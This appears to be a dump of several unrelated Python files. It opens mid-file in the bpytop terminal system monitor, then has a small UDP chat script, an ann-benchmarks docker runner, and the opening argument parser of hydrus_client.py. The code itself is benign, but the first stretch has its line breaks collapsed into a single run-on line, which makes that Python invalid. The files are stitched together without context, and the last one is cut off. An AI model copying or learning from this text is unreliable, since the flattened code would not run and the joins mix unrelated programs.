Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}') cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)] cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True) cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False) @classmethod def success(cls): if not CONFIG.show_init or cls.resized: return cls.draw_bg(5) Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}') @staticmethod def fail(err): if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}') sleep(2) errlog.exception(f'{err}') clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.') @classmethod def draw_bg(cls, times: int = 5): for _ in range(times): sleep(0.05) x = randint(0, 100) Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}') Draw.out("initbg", "banner", "init") @classmethod def done(cls): cls.running = False if not CONFIG.show_init: return if cls.resized: Draw.now(Term.clear) else: cls.draw_bg(10) Draw.clear("initbg", "banner", "init", saved=True) if cls.resized: return del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors #? 
Functions -------------------------------------------------------------------------------------> def get_cpu_name() -> str: '''Fetch a suitable CPU identifier from the CPU model name string''' name: str = "" nlist: List = [] command: str = "" cmd_out: str = "" rem_line: str = "" if SYSTEM == "Linux": command = "cat /proc/cpuinfo" rem_line = "model name" elif SYSTEM == "MacOS": command ="sysctl -n machdep.cpu.brand_string" elif SYSTEM == "BSD": command ="sysctl hw.model" rem_line = "hw.model" try: cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True) except: pass if rem_line: for line in cmd_out.split("\n"): if rem_line in line: name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip() else: name = cmd_out nlist = name.split(" ") try: if "Xeon" in name and "CPU" in name: name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)] elif "Ryzen" in name: name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3]) elif "Duo" in name and "@" in name: name = " ".join(nlist[:nlist.index("@")]) elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit(): name = nlist[nlist.index("CPU")-1] except: pass name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "") name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name) name = " ".join(name.split()) return name def get_cpu_core_mapping() -> List[int]: mapping: List[int] = [] if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"): try: mapping = [0] * THREADS num = 0 with open("/proc/cpuinfo", "r") as f: for line in f: if line.startswith("processor"): num = int(line.strip()[(line.index(": ")+2):]) if num > THREADS - 1: break elif line.startswith("core id"): mapping[num] = int(line.strip()[(line.index(": ")+2):]) if num < THREADS - 1: raise Exception except: mapping = [] if not mapping: mapping = [] for _ in range(THREADS // CORES): mapping.extend([x for x in range(CORES)]) return 
mapping def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str: '''Create a box from a box object or by given arguments''' out: str = f'{Term.fg}{Term.bg}' if not line_color: line_color = THEME.div_line if not title_color: title_color = THEME.title #* Get values from box class if given if box: x = box.x y = box.y width = box.width height =box.height title = box.name hlines: Tuple[int, int] = (y, y + height - 1) out += f'{line_color}' #* Draw all horizontal lines for hpos in hlines: out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}' #* Draw all vertical lines and fill if enabled for hpos in range(hlines[0]+1, hlines[1]): out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}' #* Draw corners out += f'{Mv.to(y, x)}{Symbol.left_up}\ {Mv.to(y, x + width - 1)}{Symbol.right_up}\ {Mv.to(y + height - 1, x)}{Symbol.left_down}\ {Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}' #* Draw titles if enabled if title: out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title}{Fx.ub}{line_color}{Symbol.title_right}' if title2: out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}' return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}' def now_sleeping(signum, frame): """Reset terminal settings and stop background input read before putting to sleep""" Key.stop() Collector.stop() Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title()) Term.echo(True) os.kill(os.getpid(), signal.SIGSTOP) def now_awake(signum, frame): """Set terminal settings and restart background input read""" Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP")) Term.echo(False) Key.start() Term.refresh() Box.calc_sizes() Box.draw_bg() Collector.start() 
def quit_sigint(signum, frame):
    """SIGINT redirection to clean_quit()"""
    clean_quit()

def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
    """Stop background input read, save current config and reset terminal settings before quitting"""
    global THREAD_ERROR
    if thread:
        # Called from a worker thread: record the error code and interrupt the
        # main thread, which will re-enter clean_quit() and do the real work.
        THREAD_ERROR = errcode
        interrupt_main()
        return
    if THREAD_ERROR:
        errcode = THREAD_ERROR
    Key.stop()
    Collector.stop()
    # Only persist the config on a clean exit.
    if not errcode: CONFIG.save_config()
    # Restore the terminal: normal screen buffer, visible cursor, mouse
    # reporting off, original title, input echo back on.
    Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
    Term.echo(True)
    if errcode == 0:
        errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
    else:
        errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
        if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
    if errmsg: print(errmsg)
    raise SystemExit(errcode)

def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
    '''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
    * bit=True or defaults to bytes
    * start=int to set 1024 multiplier starting unit
    * short=True always returns 0 decimals and shortens unit to 1 character
    '''
    out: str = ""
    mult: int = 8 if bit else 1
    selector: int = start
    unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
    # value is scaled by 100 so two decimal digits survive the integer
    # right-shifts below; they are reinserted as a "." when formatting.
    if isinstance(value, float): value = round(value * 100 * mult)
    elif value > 0: value *= 100 * mult
    else: value = 0
    while len(f'{value}') > 5 and value >= 102400:
        value >>= 10
        if value < 100:
            out = f'{value}'
            break
        selector += 1
    else:
        # Loop ended without break: reconstruct the decimal point from the
        # two scaled-in digits (only when a larger unit was selected).
        if len(f'{value}') == 4 and selector > 0:
            out = f'{value}'[:-2] + "." + f'{value}'[-2]
        elif len(f'{value}') == 3 and selector > 0:
            out = f'{value}'[:-2] + "." + f'{value}'[-2:]
        elif len(f'{value}') >= 2:
            out = f'{value}'[:-2]
        else:
            out = f'{value}'
    if short:
        if "." in out:
            out = f'{round(float(out))}'
        if len(out) > 3:
            # Too wide even without decimals: bump to the next unit.
            out = f'{int(out[0]) + 1}'
            selector += 1
    out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
    if per_second: out += "ps" if bit else "/s"
    return out

def units_to_bytes(value: str) -> int:
    """Parse a human size string like "10mbit" / "100 MByte" / "2g" into an integer byte count."""
    if not value: return 0
    out: int = 0
    mult: int = 0
    bit: bool = False
    value_i: int = 0
    units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
    try:
        # Strip plural "s", then a "bit"/"byte" suffix, then a k/m/g multiplier.
        if value.lower().endswith("s"): value = value[:-1]
        if value.lower().endswith("bit"):
            bit = True
            value = value[:-3]
        elif value.lower().endswith("byte"):
            value = value[:-4]
        if value[-1].lower() in units:
            mult = units[value[-1].lower()]
            value = value[:-1]
        if "." in value and value.replace(".", "").isdigit():
            if mult > 0:
                # Fold one 1024 step into the value to keep the fraction.
                value_i = round(float(value) * 1024)
                mult -= 1
            else:
                value_i = round(float(value))
        elif value.isdigit():
            value_i = int(value)
        if bit: value_i = round(value_i / 8)
        out = int(value_i) << (10 * mult)
    except ValueError:
        out = 0
    return out

def min_max(value: int, min_value: int = 0, max_value: int = 100) -> int:
    """Clamp value to the inclusive range [min_value, max_value]."""
    return max(min_value, min(value, max_value))

def readfile(file: str, default: str = "") -> str:
    """Return the stripped contents of file, or default if missing/unreadable."""
    out: Union[str, None] = None
    if os.path.isfile(file):
        try:
            with open(file, "r") as f:
                out = f.read().strip()
        except:
            pass
    return default if out is None else out

def process_keys():
    """Drain the input queue and apply the keybinding actions (quit, menus, toggles, process box navigation and signals)."""
    mouse_pos: Tuple[int, int] = (0, 0)
    filtered: bool = False
    global ARG_MODE
    while Key.has_key():
        key = Key.get()
        if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
            mouse_pos = Key.get_mouse()
            # Mouse events only act inside the process box; a click outside
            # unselects, scrolls outside are dropped.
            if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
                pass
            elif key == "mouse_click":
                key = "mouse_unselect"
            else:
                key = "_null"
        if ProcBox.filtering:
            # While the filter prompt is active, keys edit the search filter
            # instead of triggering their normal bindings.
            if key in ["enter", "mouse_click", "mouse_unselect"]:
                ProcBox.filtering = False
                Collector.collect(ProcCollector, redraw=True, only_draw=True)
                continue
            elif key in ["escape", "delete"]:
                ProcCollector.search_filter = ""
                ProcBox.filtering = False
            elif len(key) == 1:
                ProcCollector.search_filter += key
            elif key == "backspace" and len(ProcCollector.search_filter) > 0:
                ProcCollector.search_filter = ProcCollector.search_filter[:-1]
            else:
                continue
            Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
            if filtered: Collector.collect_done.wait(0.1)
            filtered = True
            continue
        if key == "_null":
            continue
        elif key == "q":
            clean_quit()
        elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
            CONFIG.update_ms += 100
            Box.draw_update_ms()
        elif key == "-" and CONFIG.update_ms - 100 >= 100:
            CONFIG.update_ms -= 100
            Box.draw_update_ms()
        elif key in ["b", "n"]:
            NetCollector.switch(key)
        elif key in ["M", "escape"]:
            Menu.main()
        elif key in ["o", "f2"]:
            Menu.options()
        elif key in ["h", "f1"]:
            Menu.help()
        elif key == "z":
            NetCollector.reset = not NetCollector.reset
            Collector.collect(NetCollector, redraw=True)
        elif key == "y":
            CONFIG.net_sync = not CONFIG.net_sync
            Collector.collect(NetCollector, redraw=True)
        elif key == "a":
            NetCollector.auto_min = not NetCollector.auto_min
            NetCollector.net_min = {"download" : -1, "upload" : -1}
            Collector.collect(NetCollector, redraw=True)
        elif key in ["left", "right"]:
            ProcCollector.sorting(key)
        elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
            # Space toggles collapse of the selected branch in tree view.
            if ProcBox.selected_pid in ProcCollector.collapsed:
                ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
            Collector.collect(ProcCollector, interrupt=True, redraw=True)
        elif key == "e":
            CONFIG.proc_tree = not CONFIG.proc_tree
            Collector.collect(ProcCollector, interrupt=True, redraw=True)
        elif key == "r":
            CONFIG.proc_reversed = not CONFIG.proc_reversed
            Collector.collect(ProcCollector, interrupt=True, redraw=True)
        elif key == "c":
            CONFIG.proc_per_core = not CONFIG.proc_per_core
            Collector.collect(ProcCollector, interrupt=True, redraw=True)
        elif key == "g":
            CONFIG.mem_graphs = not CONFIG.mem_graphs
            Collector.collect(MemCollector, interrupt=True, redraw=True)
        elif key == "s":
            Collector.collect_idle.wait()
            CONFIG.swap_disk = not CONFIG.swap_disk
            Collector.collect(MemCollector, interrupt=True, redraw=True)
        elif key == "f":
            ProcBox.filtering = True
            if not ProcCollector.search_filter: ProcBox.start = 0
            Collector.collect(ProcCollector, redraw=True, only_draw=True)
        elif key == "m":
            # Cycle view modes (or leave a command-line forced mode first).
            if ARG_MODE:
                ARG_MODE = ""
            elif CONFIG.view_modes.index(CONFIG.view_mode) + 1 > len(CONFIG.view_modes) - 1:
                CONFIG.view_mode = CONFIG.view_modes[0]
            else:
                CONFIG.view_mode = CONFIG.view_modes[(CONFIG.view_modes.index(CONFIG.view_mode) + 1)]
            Box.proc_mode = CONFIG.view_mode == "proc"
            Box.stat_mode = CONFIG.view_mode == "stat"
            Draw.clear(saved=True)
            Term.refresh(force=True)
        elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
            # t/k/i send SIGTERM/SIGKILL/SIGINT to the selected (or detailed) process.
            pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
            if psutil.pid_exists(pid):
                if key.lower() == "t": sig = signal.SIGTERM
                elif key.lower() == "k": sig = signal.SIGKILL
                elif key.lower() == "i": sig = signal.SIGINT
                try:
                    os.kill(pid, sig)
                except Exception as e:
                    errlog.error(f'Exception when sending signal {sig} to pid {pid}')
                    errlog.exception(f'{e}')
        elif key == "delete" and ProcCollector.search_filter:
            ProcCollector.search_filter = ""
            Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
        elif key == "enter":
            # Enter toggles the detailed view for the selected process.
            if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
                ProcCollector.detailed = True
                ProcBox.last_selection = ProcBox.selected
                ProcBox.selected = 0
                ProcCollector.detailed_pid = ProcBox.selected_pid
                ProcBox.resized = True
            elif ProcCollector.detailed:
                ProcBox.selected = ProcBox.last_selection
                ProcBox.last_selection = 0
                ProcCollector.detailed = False
                ProcCollector.detailed_pid = None
                ProcBox.resized = True
            else:
                continue
            ProcCollector.details = {}
            ProcCollector.details_cpu = []
            ProcCollector.details_mem = []
            Graphs.detailed_cpu = NotImplemented
            Graphs.detailed_mem = NotImplemented
            Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
        elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
            ProcBox.selector(key, mouse_pos)

#? Pre main -------------------------------------------------------------------------------------->

CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme

def main():
    """Initialize terminal, theme, boxes, signal handlers and worker threads, then run the main loop until quit."""
    global THEME

    Term.width = os.get_terminal_size().columns
    Term.height = os.get_terminal_size().lines

    #? Init -------------------------------------------------------------------------------------->
    if DEBUG: TimeIt.start("Init")

    #? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
    Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
    Term.echo(False)
    Term.refresh(force=True)

    #? Start a thread checking for updates while running init
    if CONFIG.update_check: UpdateChecker.run()

    #? Draw banner and init status
    if CONFIG.show_init and not Init.resized:
        Init.start()

    #? Load theme
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
    try:
        THEME = Theme(CONFIG.color_theme)
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Setup boxes
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
    try:
        if CONFIG.check_temp: CpuCollector.get_sensors()
        Box.calc_sizes()
        Box.draw_bg(now=False)
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
    try:
        signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
        signal.signal(signal.SIGCONT, now_awake) #* Resume
        signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
        signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Start a separate thread for reading keyboard input
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
    try:
        Key.start()
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Start a separate thread for data collection and drawing
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
    try:
        Collector.start()
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Collect data and draw to buffer
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
    try:
        Collector.collect(draw_now=False)
        pass
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Draw to screen
    if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
    try:
        Collector.collect_done.wait()
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    Init.done()
    Term.refresh()
    Draw.out(clear=True)
    if CONFIG.draw_clock:
        Box.clock_on = True
    if DEBUG: TimeIt.stop("Init")

    #? Main loop ------------------------------------------------------------------------------------->

    def run():
        # Refresh/collect loop: wait up to the remaining timer interval for
        # input, process any keys, then trigger a new collection round.
        while not False:
            Term.refresh()
            Timer.stamp()

            while Timer.not_zero():
                if Key.input_wait(Timer.left()):
                    process_keys()

            Collector.collect()

    #? Start main loop
    try:
        run()
    except Exception as e:
        errlog.exception(f'{e}')
        clean_quit(1)
    else:
        #? Quit cleanly even if false starts being true...
        clean_quit()

if __name__ == "__main__": main()
chatapp.py
"""Minimal peer-to-peer UDP chat: one thread receives datagrams, the main flow sends lines typed on stdin."""
import socket
import threading

# Using IPv4 and UDP protocol
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

ip = input("Enter your IP address: ")
port = int(input("Enter your port: "))

# Creating socket (bind to the local address so the peer can reach us)
s.bind((ip, port))

recvIP = input("Enter the IP of the receiver: ")
recvPort = int(input("Enter the port of the receiver: "))

# Function for receiving messages
def receiveMessages():
    """Block on the socket forever, printing each datagram as it arrives."""
    while True:
        data, _addr = s.recvfrom(1024)
        print(f'\nReceived message: {data.decode()}')

# Function for sending messages
def sendMessages():
    """Read lines from stdin and send each one to the configured peer."""
    while True:
        message = input("Enter the message: ")
        s.sendto(message.encode(), (recvIP, recvPort))

# BUGFIX: the receiver thread blocks indefinitely in recvfrom() and was
# started as a non-daemon thread, so the interpreter could never shut down
# once the sending side stopped (Ctrl-C/EOF left a hung process). Marking
# it as a daemon lets the process exit when the send/main threads finish.
receive = threading.Thread(target=receiveMessages, daemon=True)
send = threading.Thread(target=sendMessages)

receive.start()
send.start()
runner.py
import argparse
import datetime
import colors
import docker
import json
import multiprocessing
import numpy
import os
import psutil
import requests
import sys
import threading
import time
import psutil

from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import (Definition,
                                                   instantiate_algorithm,
                                                   get_algorithm_name)
from ann_benchmarks.distance import metrics, dataset_transform
from ann_benchmarks.results import store_results


def run_individual_query(algo, X_train, X_test, distance, count, run_count,
                         batch, batchsize):
    """Run the query phase for an already-fitted algorithm.

    Executes the test queries run_count times (keeping the best per-query
    search time), either one-by-one or in batches of batchsize, and returns
    a (attrs, results) pair: a dict of run metadata and a list of
    (query_time, [(neighbor_index, distance), ...]) per test point.
    """
    # Use the algorithm's prepared-query API if it exposes one for this mode.
    prepared_queries = \
        (batch and hasattr(algo, "prepare_batch_query")) or \
        ((not batch) and hasattr(algo, "prepare_query"))

    best_search_time = float('inf')
    for i in range(run_count):
        print('Run %d/%d...' % (i + 1, run_count))
        # a bit dumb but can't be a scalar since of Python's scoping rules
        n_items_processed = [0]

        def single_query(v):
            # Time one query; only the algorithm call is inside the timer.
            if prepared_queries:
                algo.prepare_query(v, count)
                start = time.time()
                algo.run_prepared_query()
                total = (time.time() - start)
                candidates = algo.get_prepared_query_results()
            else:
                start = time.time()
                candidates = algo.query(v, count)
                total = (time.time() - start)
            return (total, v, candidates)

        def batch_query(X):
            # Time one batch; per-query time is the batch total divided by len(X).
            if prepared_queries:
                algo.prepare_batch_query(X, count)
                start = time.time()
                algo.run_batch_query()
                total = (time.time() - start)
            else:
                start = time.time()
                algo.batch_query(X, count)
                total = (time.time() - start)
            results = algo.get_batch_results()
            # Attach true distances to each returned neighbor index.
            candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx])))  # noqa
                           for idx in single_results]
                          for v, single_results in zip(X, results)]
            return [(total / float(len(X)), v) for v in candidates]

        def get_candidates(result):
            # Convert raw neighbor ids into (id, true_distance) pairs.
            total, v, ids = result
            candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx])))  # noqa
                          for idx in ids]
            n_items_processed[0] += 1
            if n_items_processed[0] % 1000 == 0:
                print('Processed %d/%d queries...'
                      % (n_items_processed[0], len(X_test)))
            if len(candidates) > count:
                print('warning: algorithm %s returned %d results, but count'
                      ' is only %d)' % (algo, len(candidates), count))
            return (total, candidates)

        if batch:
            if batchsize >= len(X_test):
                results = batch_query(X_test)
            else:
                # Split the test set into full batches plus an optional tail.
                ress = [batch_query(X_test[batchsize*i:batchsize*(i+1)])
                        for i in range(int(len(X_test)/batchsize))]
                tail = len(X_test) % batchsize
                if tail != 0:
                    ress.append(batch_query(X_test[-tail:]))
                results = []
                for item in ress:
                    results.extend(item)
            handle_time = 0
        else:
            query_list = [single_query(x) for x in X_test]
            handle_time, handled_list = algo.handle_query_list_result(query_list)
            results = [get_candidates(l) for l in handled_list]

        total_time = sum(time for time, _ in results) + handle_time
        total_candidates = sum(len(candidates) for _, candidates in results)
        search_time = total_time / len(X_test)
        # print("search_time: ", search_time)
        avg_candidates = total_candidates / len(X_test)
        best_search_time = min(best_search_time, search_time)

    verbose = hasattr(algo, "query_verbose")
    attrs = {
        "batch_mode": batch,
        "best_search_time": best_search_time,
        "candidates": avg_candidates,
        "expect_extra": verbose,
        "name": str(algo),
        "run_count": run_count,
        "distance": distance,
        "count": int(count)
    }
    additional = algo.get_additional()
    for k in additional:
        attrs[k] = additional[k]
    return (attrs, results)


def run(definition, dataset, count, run_count, batch, batchsize):
    """Instantiate the algorithm, fit it on the dataset's train split, run every
    query-argument group through run_individual_query and store the results."""
    algo = instantiate_algorithm(definition)
    assert not definition.query_argument_groups \
        or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor,
               definition.arguments)

    D = get_dataset(dataset)
    X_train = numpy.array(D['train'])
    X_test = numpy.array(D['test'])
    distance = D.attrs['distance']
    print('got a train set of size (%d * %d)' % X_train.shape)
    print('got %d queries' % len(X_test))

    # Apply the metric-specific transform (e.g. normalization) to both splits.
    X_train = dataset_transform[distance](X_train)
    X_test = dataset_transform[distance](X_test)

    try:
        prepared_queries = False
        if hasattr(algo, "supports_prepared_queries"):
            prepared_queries = algo.supports_prepared_queries()

        # Measure build time and index memory footprint around fit().
        t0 = time.time()
        memory_usage_before = algo.get_memory_usage()
        algo.fit(X_train)
        build_time = time.time() - t0
        index_size = algo.get_memory_usage() - memory_usage_before
        print('Built index in', build_time)
        print('Index size: ', index_size)

        query_argument_groups = definition.query_argument_groups
        # Make sure that algorithms with no query argument groups still get run
        # once by providing them with a single, empty, harmless group
        if not query_argument_groups:
            query_argument_groups = [[]]

        for pos, query_arguments in enumerate(query_argument_groups, 1):
            print("Running query argument group %d of %d..." %
                  (pos, len(query_argument_groups)))
            if query_arguments:
                algo.set_query_arguments(*query_arguments)
            descriptor, results = run_individual_query(
                algo, X_train, X_test, distance, count, run_count, batch,
                batchsize)
            descriptor["build_time"] = build_time
            descriptor["index_size"] = index_size
            descriptor["algo"] = get_algorithm_name(
                definition.algorithm, batch)
            descriptor["dataset"] = dataset
            store_results(dataset, count, definition,
                          query_arguments, descriptor, results, batch)
    finally:
        # Always let the algorithm release its resources.
        algo.done()


def run_from_cmdline():
    """Entry point used inside the docker container: parse the CLI produced by
    run_docker(), rebuild the Definition and call run()."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--dataset',
        # choices=DATASETS.keys(),
        required=True)
    parser.add_argument(
        '--algorithm',
        required=True)
    parser.add_argument(
        '--module',
        required=True)
    parser.add_argument(
        '--constructor',
        required=True)
    parser.add_argument(
        '--count',
        required=True,
        type=int)
    parser.add_argument(
        '--runs',
        required=True,
        type=int)
    parser.add_argument(
        '--batchsize',
        required=True,
        type=int)
    parser.add_argument(
        '--batch',
        action='store_true')
    parser.add_argument(
        'build')
    parser.add_argument(
        'queries',
        nargs='*',
        default=[])
    args = parser.parse_args()
    # Positional args carry JSON-encoded constructor/query arguments.
    algo_args = json.loads(args.build)
    query_args = [json.loads(q) for q in args.queries]

    definition = Definition(
        algorithm=args.algorithm,
        docker_tag=None,  # not needed
        module=args.module,
        constructor=args.constructor,
        arguments=algo_args,
        query_argument_groups=query_args,
        disabled=False
    )
    run(definition, args.dataset, args.count, args.runs, args.batch,
        args.batchsize)


def run_docker(definition, dataset, count, runs, timeout, batch, cpu_limit,
               batchsize, mem_limit=None):
    """Launch the benchmark for one algorithm definition inside its docker
    image, streaming the container logs and raising on a non-zero exit."""
    cmd = ['--dataset', dataset,
           '--algorithm', definition.algorithm,
           '--module', definition.module,
           '--constructor', definition.constructor,
           '--runs', str(runs),
           '--count', str(count)]
    if batch:
        cmd += ['--batchsize', str(batchsize)]
        cmd += ['--batch']
    cmd.append(json.dumps(definition.arguments))
    cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
    print('Running command', cmd)
    client = docker.from_env()
    if mem_limit is None:
        mem_limit = psutil.virtual_memory().available
    print('Memory limit:', mem_limit)
    if batch:
        # Batch mode gets all logical CPUs.
        cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
    print('Running on CPUs:', cpu_limit)

    logic_cpu_num = psutil.cpu_count(logical=True)
    omp_thread = logic_cpu_num * 2 // 3 if logic_cpu_num > 1 else 1

    container = client.containers.run(
        definition.docker_tag,
        cmd,
        volumes={
            os.path.abspath('ann_benchmarks'):
                {'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
            os.path.abspath('data'):
                {'bind': '/home/app/data', 'mode': 'ro'},
            os.path.abspath('results'):
                {'bind': '/home/app/results', 'mode': 'rw'},
        },
        environment=["OMP_NUM_THREADS={}".format(omp_thread)],
        # cpuset_cpus=cpu_limit,
        # mem_limit=mem_limit,
        detach=True)

    def stream_logs():
        # Echo container output in blue so it is distinguishable from ours.
        for line in container.logs(stream=True):
            print(colors.color(line.decode().rstrip(), fg='blue'))

    # daemon=True keyword only exists on Python 3; set the attribute on 2.
    if sys.version_info >= (3, 0):
        t = threading.Thread(target=stream_logs, daemon=True)
    else:
        t = threading.Thread(target=stream_logs)
        t.daemon = True
    t.start()
    try:
        exit_code = container.wait(timeout=timeout)

        # Exit if exit code
        if exit_code == 0:
            return
        elif exit_code is not None:
            print(colors.color(container.logs().decode(), fg='red'))
            raise Exception('Child process raised exception %d' % exit_code)
    finally:
        # Remove the container whether the run succeeded, failed or timed out.
        container.remove(force=True)
hydrus_client.py
#!/usr/bin/env python3

# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md

import locale

# Best-effort: use the user's locale; a failure here must not stop the boot.
try: locale.setlocale( locale.LC_ALL, '' )
except: pass

# The whole boot sequence is wrapped so any failure can be written to a
# crash log before exiting (see the except block at the bottom).
try:

    import os
    import argparse
    import sys

    from hydrus.core import HydrusBoot

    HydrusBoot.AddBaseDirToEnvPath()

    # initialise Qt here, important it is done early
    from hydrus.client.gui import QtPorting as QP

    from hydrus.core import HydrusConstants as HC
    from hydrus.core import HydrusData
    from hydrus.core import HydrusLogger
    from hydrus.core import HydrusPaths
    from hydrus.core import HydrusGlobals as HG

    argparser = argparse.ArgumentParser( description = 'hydrus network client' )

    argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
    argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
    argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )
    argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=200)' )
    argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )
    argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )
    argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )
    argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )
    argparser.add_argument( '--no_daemons', action='store_true', help = 'run without background daemons' )
    argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )
